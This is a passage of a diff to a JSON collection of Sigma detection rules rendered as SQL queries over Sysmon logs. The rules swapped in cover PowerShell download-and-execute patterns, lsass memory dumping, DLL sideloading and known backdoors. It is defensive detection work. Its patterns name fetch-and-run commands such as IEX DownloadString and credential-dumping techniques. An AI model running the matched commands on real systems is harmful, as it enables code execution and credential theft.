ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "proc_creation_win_nslookup_poweshell_download.yml" }, { - "title": "Suspicious Subsystem for Linux Bash Execution", - "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", "status": "experimental", - "description": "Performs execution of specified file, can be used for defensive evasion.", - "author": "frack113", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Software installers that pull packages from remote systems and execute them" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object 
Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bash.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - "author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - 
"title": "Net.exe Execution", - "id": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "status": "experimental", - "description": "Detects execution of Net.exe, whether suspicious or benign.", - "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1007", - "attack.t1049", - "attack.t1018", - "attack.t1135", - "attack.t1201", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1087.001", - "attack.t1087.002", - "attack.lateral_movement", - "attack.t1021.002", - "attack.s0039" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." 
+ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% group%' ESCAPE '\\' OR CommandLine LIKE '% localgroup%' ESCAPE '\\' OR CommandLine LIKE '% user%' ESCAPE '\\' OR CommandLine LIKE '% view%' ESCAPE '\\' OR CommandLine LIKE '% share%' ESCAPE '\\' OR CommandLine LIKE '% accounts%' ESCAPE '\\' OR CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_net_susp_execution.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Python Inline Command Execution", - "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects execution of python using the \"-c\" flag. 
This is could be used as a way to launch a reverse shell or execute live python code.", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" ], "falsepositives": [ - "Python libraries that use a flag starting with \"-c\". Filter according to your environment" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'python.exe' OR (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_python_inline_command_execution.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + 
"title": "Potential DLL Sideloading Using Coregen.exe", + "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_coregen.yml" }, { - "title": "Files Added To An Archive Using Rar.EXE", - "id": "6f3e2987-db24-4c78-a860-b4f4095a7095", - 
"status": "test", - "description": "Detects usage of \"rar\" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", + "title": "Amsi.DLL Load By Uncommon Process", + "id": "facd1549-e416-48e0-b8c4-41d7215eedc8", + "status": "experimental", + "description": "Detects loading of Amsi.dll by uncommon processes", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Highly likely if rar is a default archiver in the monitored environment." + "Likely" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rar.exe' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\ngentask.exe' ESCAPE '\\') OR (Image = '') OR (Image = '')))" ], - "filename": 
"proc_creation_win_rar_compress_data.yml" + "filename": "image_load_dll_amsi_uncommon_process.yml" }, { - "title": "Writing Of Malicious Files To The Fonts Folder", - "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", - "status": "test", - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", - "author": "Sreeman", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", + "status": "experimental", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' 
OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects suspicious print spool service 
(spoolsv.exe) child processes.", - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ "attack.execution", - "attack.t1203", "attack.privilege_escalation", - "attack.t1068" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' 
OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "CMD Shell Output Redirect", - "id": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", + "title": "Potential Libvlc.DLL Sideloading", + "id": "bf9808c4-d24f-44a2-8398-b65227d406b6", "status": "experimental", - "description": "Detects the use of the redirection character \">\" to redicrect information in commandline", - "author": "frack113", + "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", + "author": "X__Junior", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Internet Download Manager extensions use named pipes and redirection via CLI. 
Filter it out if you use it in your environment" + "False positives are expected if VLC is installed in non-default locations" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR CommandLine LIKE '%chrome-extension://%' ESCAPE '\\' OR CommandLine LIKE '%\\\\.\\\\pipe\\\\chrome.nativeMessaging%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\libvlc.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_redirect.yml" + "filename": "image_load_side_load_libvlc.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "status": "test", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.t1047" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "DotNET Assembly DLL Loaded Via Office Application", + "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "status": "test", + "description": "Detects any assembly DLL being loaded by an Office Product", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_office_dotnet_assembly_dll_load.yml" }, { - "title": "Indirect Command Execution By Program Compatibility Wizard", - "id": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", "status": "test", - "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", - "author": "A. 
